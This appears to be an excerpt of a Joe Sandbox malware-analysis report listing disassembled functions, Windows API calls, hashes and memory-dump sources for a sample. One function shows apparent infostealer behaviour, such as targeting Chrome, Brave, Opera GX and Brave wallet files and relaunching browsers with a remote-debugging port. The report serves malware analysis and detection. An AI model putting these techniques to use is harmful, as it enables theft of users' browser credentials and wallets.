                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3183270410-0
                                                                                                                                                                                                                                                          • Opcode ID: d363a23ff586faba156b1f86aaee5762fe13d6bf07035d430dd8c9650b67cbfa
                                                                                                                                                                                                                                                          • Instruction ID: aebfbf1b474f85e7f92c5720fabaff0562bf82451c57e992c444cac97ba5e0b8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d363a23ff586faba156b1f86aaee5762fe13d6bf07035d430dd8c9650b67cbfa
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CF0903660020CABD760EAA8AC49FFEB7B89F45700F004069F744D7190DFB8E9858B94
                                                                                                                                                                                                                                                          Function 00FF0EA8 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FE1375), ref: 00FF0EB4
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,00FE1375), ref: 00FF0EBB
                                                                                                                                                                                                                                                          • GetComputerNameA.KERNEL32(00000000,00FE1375), ref: 00FF0ECF
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4203777966-0
                                                                                                                                                                                                                                                          • Opcode ID: f032edc58ad1bb718ce2abf69626579ba890dee61b9f40c7eb0c237cd4e769cb
                                                                                                                                                                                                                                                          • Instruction ID: 4cfbf9c6b2ea9134eedd31b90b3e729e163ad4cb9a333430d31fe2d50f12563d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f032edc58ad1bb718ce2abf69626579ba890dee61b9f40c7eb0c237cd4e769cb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9E08CB6200208ABD720CB99DC0DE9B76ECEB80B11F040015FA45C2144DAF99984A760
                                                                                                                                                                                                                                                          Function 6CD60A63 Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __RTC_Initialize.LIBCMT ref: 6CD60AB0
                                                                                                                                                                                                                                                            • Part of subcall function 6CD60EDE: InitializeSListHead.KERNEL32(6CDB7A28,6CD60ABA,6CDB5718,00000010,6CD60A4B,?,?,?,6CD60C73,?,00000001,?,?,00000001,?,6CDB5760), ref: 6CD60EE3
                                                                                                                                                                                                                                                          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CD60B1A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3231365870-0
                                                                                                                                                                                                                                                          • Opcode ID: ad0c08fbcca25956d4ff9785dbec72604859d57e763d5d5dcd2a38ec35082ba1
                                                                                                                                                                                                                                                          • Instruction ID: 9d8b67c309a1462bc293906148c46aa610022c33591a4888e9600fe3af6c90dd
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad0c08fbcca25956d4ff9785dbec72604859d57e763d5d5dcd2a38ec35082ba1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4212331245280EBEB119BBA84107E837A19F123ADF204556C5856BEE1DB72A14CC679
                                                                                                                                                                                                                                                          Function 00FF7F30 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 839b56806488cbb4484d35273f3bb62fe5ba1eef886e43951e7b7e70669366ac
                                                                                                                                                                                                                                                          • Instruction ID: 28a7195427b18bed691c762234884c536637b49fd2c9c4dbc4b8f267f713eaca
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 839b56806488cbb4484d35273f3bb62fe5ba1eef886e43951e7b7e70669366ac
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2517D71D293486BCF617BFF9C899B4F2E56FA1334B150482B2108A1B69B708D807EE1
                                                                                                                                                                                                                                                          Function 6CD66DBC Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,6CD6686A,00000001,00000364,00000000,FFFFFFFF,000000FF,?,6CD65DDF,00000000,00000000), ref: 6CD66DFD
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                          • Opcode ID: 7aab5dfd8ed8c82ba068b94427f3e6681ba7ce4f503d07e0258dc121134cad60
                                                                                                                                                                                                                                                          • Instruction ID: 48fffa6c7856e93c6a3194484ed62f502d6411ba420e79f4e01e0ce5455750af
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7aab5dfd8ed8c82ba068b94427f3e6681ba7ce4f503d07e0258dc121134cad60
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40F0B431246525E7EB011F27CC05A9F3758AB427B4F118127E818D7EB1DB30D412CAF0
                                                                                                                                                                                                                                                          Function 00FF1FDF Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00FF2020
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1699248803-0
                                                                                                                                                                                                                                                          • Opcode ID: b7497ff01aef7700d9c24966f3f6e95fef17e0513238b08685c13a5bb6c6d040
                                                                                                                                                                                                                                                          • Instruction ID: 821e5ad8cda3415825fd3377c87997646aba41741a93d63e63a3fb58b3d75b52
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7497ff01aef7700d9c24966f3f6e95fef17e0513238b08685c13a5bb6c6d040
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9F03A72A1016DABDB15DFB8DC509BEB7FCEB48200F0045B6FA05E3291DA34AF458B90
                                                                                                                                                                                                                                                          Function 00FF2913 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • SHFileOperationA.SHELL32(?), ref: 00FF2949
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FileOperation
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3080627654-0
                                                                                                                                                                                                                                                          • Opcode ID: ed32dbbae085864e0dadff64f40a0666c3023a9ebc6e3d6a78e779a9fd28f2e8
                                                                                                                                                                                                                                                          • Instruction ID: 479b71f41dcfd0d4a289e3bd61885615303aa7ab0efc5026cf383d56223cf2d3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed32dbbae085864e0dadff64f40a0666c3023a9ebc6e3d6a78e779a9fd28f2e8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02E092B4D0421E9FDB44EFA8D9062EEBAF8FF48308F00406AC155F7245E77852458BA5

                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                          Function 00FE9DAF Relevance: 61.9, APIs: 28, Strings: 7, Instructions: 648filestringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,01015802,010157FF,010162F0,010157FE,?,?,?), ref: 00FE9E59
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,010162F4), ref: 00FE9E7A
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,010162F8), ref: 00FE9E94
                                                                                                                                                                                                                                                            • Part of subcall function 00FF076C: lstrlenA.KERNEL32(?,?,00FF733C,0101572F,0101572E,?,?,?,?,00FF8011), ref: 00FF0772
                                                                                                                                                                                                                                                            • Part of subcall function 00FF076C: lstrcpyA.KERNEL32(00000000,00000000,?,00FF733C,0101572F,0101572E,?,?,?,?,00FF8011), ref: 00FF07A4
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Opera GX,010162FC,?,01015803), ref: 00FE9F26
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Brave,0101631C,01016320,010162FC,?,01015803), ref: 00FEA0A8
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 00FEA0C2
                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00FEA182
                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00FEA251
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 00FEA28F
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 00FEA2F9
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(00FECE8D), ref: 00FEA310
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FEA339
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FEA34B
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FEA35B
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?, --remote-debugging-port=9223 --profile-directory="), ref: 00FEA36D
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FEA3E3
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FEA3F5
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FEA405
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?, --remote-debugging-port=9223 --profile-directory="), ref: 00FEA417
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 00FEA465
                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00FEA525
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 00FEA5CD
                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00FEA62E
                                                                                                                                                                                                                                                            • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
                                                                                                                                                                                                                                                            • Part of subcall function 00FE8E72: lstrlenA.KERNEL32(?), ref: 00FE906B
                                                                                                                                                                                                                                                            • Part of subcall function 00FE8E72: lstrlenA.KERNEL32(?), ref: 00FE9086
                                                                                                                                                                                                                                                            • Part of subcall function 00FE95E0: lstrlenA.KERNEL32(?), ref: 00FE9A05
                                                                                                                                                                                                                                                            • Part of subcall function 00FE95E0: lstrlenA.KERNEL32(?), ref: 00FE9A20
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 00FEA65F
                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00FEA71F
                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00FEA7B9
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
                                                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 00FEA897
                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00FEA8AB
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • --remote-debugging-port=9223 --profile-directory=", xrefs: 00FEA361
                                                                                                                                                                                                                                                          • --remote-debugging-port=9223 --profile-directory=", xrefs: 00FEA40B
                                                                                                                                                                                                                                                          • Brave, xrefs: 00FEA0A0
                                                                                                                                                                                                                                                          • Preferences, xrefs: 00FEA0B6
                                                                                                                                                                                                                                                          • Opera GX, xrefs: 00FE9F1E
                                                                                                                                                                                                                                                          • \BraveWallet\Preferences, xrefs: 00FEA198
                                                                                                                                                                                                                                                          • Google Chrome, xrefs: 00FEA5C5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
